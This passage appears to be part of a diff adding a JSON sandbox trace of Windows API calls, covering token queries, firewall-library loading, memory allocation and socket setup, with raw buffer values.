"parentcaller": "0x7512637d", + "category": "filesystem", + "api": "NtOpenDirectoryObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "DirectoryHandle", + "value": "0x0000041c" + }, + { + "name": "DesiredAccess", + "value": "0x00020001", + "pretty_value": "FILE_READ_ACCESS|READ_CONTROL" + }, + { + "name": "ObjectAttributes", + "value": "C:\\RPC Control" + } + ], + "repeated": 0, + "id": 621 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ba174", + "parentcaller": "0x751214b9", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 622 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77046a50", + "parentcaller": "0x77049486", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "10" + }, + { + "name": "TokenInformation", + "value": "g\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\xcd7\\x03\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xa8\\x95\\x1d\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 623 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770490f4", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "4" + }, + { + "name": "TokenInformation", + "value": "\\xbc\\xffO\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\\\x00S\\x00y\\x00s\\x00t\\x00e\\x00m\\x003\\x002\\x00\\\\x00r\\x00a\\x00s\\x00a\\x00d\\x00h\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 624 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049133", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "25" + }, + { + "name": "TokenInformation", + "value": "\\xd0sQ\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x08UG\\xec\\xe9\\x8f\\xdb\\x01\\x02\\x00\\x00\\x00\\x05\\x00\\x00\\x00\n\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x002\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 625 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049150", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 626 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704918f", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "$;Q\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\x01\\x02\\x00\\x00" + } + ], + "repeated": 0, + "id": 627 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491a8", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 628 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491e3", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "4\\xf8Q\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00'7\\x03\\x00" + } + ], + "repeated": 0, + "id": 629 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049270", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc6\\x9a%s\\x04\\xb6%s\\x06\\x00\\x00\\x00\\xf0\\xb5%sT\\x00\\x00\\x000\\xf8Q\\x00\\x00\\x00#\\x00\\xfc\\xef\\xf0\\xef \\x04\\x00\\x00d\\x01\\x00\\x00\\x00\\x00I\\x00#\\x00\\x00\\xc0 \\x04\\x00\\x00D\\xf02\\x05\\xe3\\x91\\x04w \\x04\\x00\\x00" + } + ], + "repeated": 0, + "id": 630 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704929e", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x8c\\xf8\\x83\\x02\\xd8\\x8f'sd\\x01~\\x02#\\x00\\x00\\xc0\\x04\\xa0\\x04s\\xeb?\\xbf\\xfa\\xec\\xea2\\x05 \\x04\\x00\\x00t\\xf62\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xfc\\xef2\\x05v\\xb6\\x07s\\x1c\\x00\\x00\\x00\\xbc\\x9a%s \\xb6%s" + } + ], + "repeated": 0, + "id": 631 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77046a50", + "parentcaller": "0x77047181", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "10" + }, + { + "name": "TokenInformation", + "value": "g\\x95\\x1d\\x00\\x00\\x00\\x00\\x00\\xcd7\\x03\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xa8\\x95\\x1d\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 632 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770490f4", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "4" + }, + { + "name": "TokenInformation", + "value": "l\tP\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 633 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049133", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "25" + }, + { + "name": "TokenInformation", + "value": "\\x80tQ\\x00`\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 634 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049150", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 635 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704918f", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "5" + }, + { + "name": "TokenInformation", + "value": "\\x147Q\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\x01\\x02\\x00\\x00" + } + ], + "repeated": 0, + "id": 636 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491a8", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 637 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770491e3", + "parentcaller": "0x77046af5", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "6" + }, + { + "name": "TokenInformation", + "value": "\\x94-S\\x00\\x02\\x00P\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x10\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x00\\x10\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x12\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x00\\xa0\\x01\\x03\\x00\\x00\\x00\\x00\\x00\\x05\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00'7\\x03\\x00" + } + ], + "repeated": 0, + "id": 638 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049270", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc6\\x9a%s\\x04\\xb6%s\\x06\\x00\\x00\\x00\\xf0\\xb5%sT\\x00\\x00\\x00\\x90-S\\x00\\x00\\x00#\\x00\\xe4\\xed\\xd8\\xed \\x04\\x00\\x00d\\x01\\x00\\x00\\x00\\x00I\\x00#\\x00\\x00\\xc0 \\x04\\x00\\x00,\\xee2\\x05\\xe3\\x91\\x04w \\x04\\x00\\x00" + } + ], + "repeated": 0, + "id": 639 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704929e", + "parentcaller": "0x770491f3", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "41" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00\\x8c\\xf8\\x83\\x02\\xd8\\x8f'sd\\x01~\\x02#\\x00\\x00\\xc0\\x04\\xa0\\x04s\\xd3=\\xbf\\xfa\\xd4\\xe82\\x05 \\x04\\x00\\x00t\\xf62\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xe4\\xed2\\x05v\\xb6\\x07s\\x1c\\x00\\x00\\x00\\xbc\\x9a%s \\xb6%s" + } + ], + "repeated": 0, + "id": 640 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770495db", + "parentcaller": "0x7704772c", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x08\\xf02\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\x0c\\x00\\x00\\x00`\\xf02\\x05\\xa4\\x88\\x04w,\\x8fJ\\x00P\\xf02\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc6\\x88\\x04w\\x00\\x00\\x00\\x00\\x00\\x032\\x05" + } + ], + "repeated": 0, + "id": 641 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77049622", + "parentcaller": "0x7704772c", + "category": "process", + "api": "NtQueryInformationToken", + "status": false, + "return": "0xffffffffc0000023", + "pretty_return": "BUFFER_TOO_SMALL", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "2" + }, + { + "name": "TokenInformation", + "value": "" + } + ], + "repeated": 0, + "id": 642 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7704965c", + "parentcaller": "0x7704772c", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "2" + }, + { + "name": "TokenInformation", + "value": "\\x0e\\x00\\x00\\x00\\x04.S\\x00\\x07\\x00\\x00\\x00 .S\\x00\\x07\\x00\\x00\\x00,.S\\x00\\x07\\x00\\x00\\x008.S\\x00\\x0f\\x00\\x00\\x00H.S\\x00\\x07\\x00\\x00\\x00X.S\\x00\\x07\\x00\\x00\\x00d.S\\x00\\x07\\x00\\x00\\x00p.S\\x00\\x07\\x00\\x00\\x00|.S\\x00\\x07\\x00\\x00\\x00\\x88.S\\x00\\x07\\x00\\x00\\x00\\x94.S\\x00\\x07\\x00\\x00\\xc0\\xa8.S\\x00\\x07\\x00\\x00\\x00\\xb4.S\\x00\\x07\\x00\\x00\\x00\\xc4.S\\x00`\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\x01\\x02\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05r\\x00\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00 \\x02\\x00\\x00\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x05 \\x00\\x00\\x00!\\x02\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x04\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x01\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x0b\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05\\x0f\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x05" + } + ], + "repeated": 0, + "id": 643 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x75121509", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000041c" + } + ], + "repeated": 0, + "id": 644 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x75121522", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000420" + } + ], + "repeated": 0, + "id": 645 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 646 + }, + { + "timestamp": "2025-03-07 21:41:19,734", + "thread_id": "9156", + "caller": "0x756b8236", + "parentcaller": "0x7553b489", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\System32\\fwpuclnt" + }, + { + "name": "DllBase", + "value": "0x73840000" + } + ], + "repeated": 0, + "id": 647 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x756b8236", + "parentcaller": "0x7553b489", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\FWPUCLNT.DLL" + }, + { + "name": "BaseAddress", + "value": "0x73840000" + } + ], + "repeated": 0, + "id": 648 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x756bfbba", + "parentcaller": "0x7553b4ab", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "fwpuclnt.dll" + }, + { + "name": "ModuleHandle", + "value": "0x73840000" + }, + { + "name": "FunctionName", + "value": "NamespaceCallout" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73855820" + } + ], + "repeated": 0, + "id": 649 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x756ba174", + "parentcaller": "0x73855e14", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 650 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x73855e2e", + "parentcaller": "0x73855c05", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 651 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x73855e44", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000438" + } + ], + "repeated": 0, + "id": 652 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 653 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00535000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 654 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00536000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 655 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x756b768f", + "parentcaller": "0x738562ec", + "category": "synchronization", + "api": "NtOpenEvent", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000440" + }, + { + "name": "EventName", + "value": "Global\\BFE_Notify_Event_{6d4c045a-8cf7-4d30-9839-97245879a785}" + } + ], + "repeated": 0, + "id": 656 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x73855d54", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000440" + } + ], + "repeated": 0, + "id": 657 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x7553dc64", + "parentcaller": "0x75544f9e", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x00000440", + "arguments": [ + { + "name": "af", + "value": "23", + "pretty_value": "AF_INET6" + }, + { + "name": "type", + "value": "2", + "pretty_value": "SOCK_DGRAM" + }, + { + "name": "protocol", + "value": "0" + }, + { + "name": "socket", + "value": "1088" + } + ], + "repeated": 0, + "id": 658 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x6db8a714", + "parentcaller": "0x7553dd57", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000103", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000440" + }, + { + "name": "IoControlCode", + "value": "0x000120bf", + "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" + }, + { + "name": "InputBuffer", + "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x19\\x00\\x00\\xc8\\x01\\x00\\x00\\x00\\xf0\\xc2P\\x00\\x0c\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x01\\x00\\x00\\x00\\xf08Q\\x00\\x1c\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 659 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x6db8a9c5", + "parentcaller": "0x6db8a75c", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000040c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 660 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "9156", + "caller": "0x6db8ac73", + "parentcaller": "0x6db8aa9e", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000440" + } + ], + "repeated": 0, + "id": 661 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x739ff7b6", + "parentcaller": "0x739ffd35", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 662 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x73a0b752", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "WSASocketW", + "status": true, + "return": "0x00000440", + "arguments": [ + { + "name": "af", + "value": "2", + "pretty_value": "AF_INET" + }, + { + "name": "type", + "value": "1", + "pretty_value": "SOCK_STREAM" + }, + { + "name": "protocol", + "value": "6", + "pretty_value": "IPPROTO_TCP" + }, + { + "name": "socket", + "value": "1088" + } + ], + "repeated": 0, + "id": 663 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x73a0b827", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1088" + }, + { + "name": "level", + "value": "0x0000ffff" + }, + { + "name": "optname", + "value": "0x00003007" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 664 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x73a0b878", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "bind", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1088" + }, + { + "name": "ip", + "value": "0.0.0.0" + }, + { + "name": "port", + "value": "0" + } + ], + "repeated": 0, + "id": 665 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x73a0b8dc", + "parentcaller": "0x73a11f5c", + "category": "network", + "api": "setsockopt", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "socket", + "value": "1088" + }, + { + "name": "level", + "value": "0x00000006" + }, + { + "name": "optname", + "value": "0x00000001" + }, + { + "name": "optval", + "value": "\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 666 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 667 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000032c" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 668 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00538000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 669 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 670 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000032c" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 671 + }, + { + "timestamp": "2025-03-07 21:41:19,749", + "thread_id": "1720", + 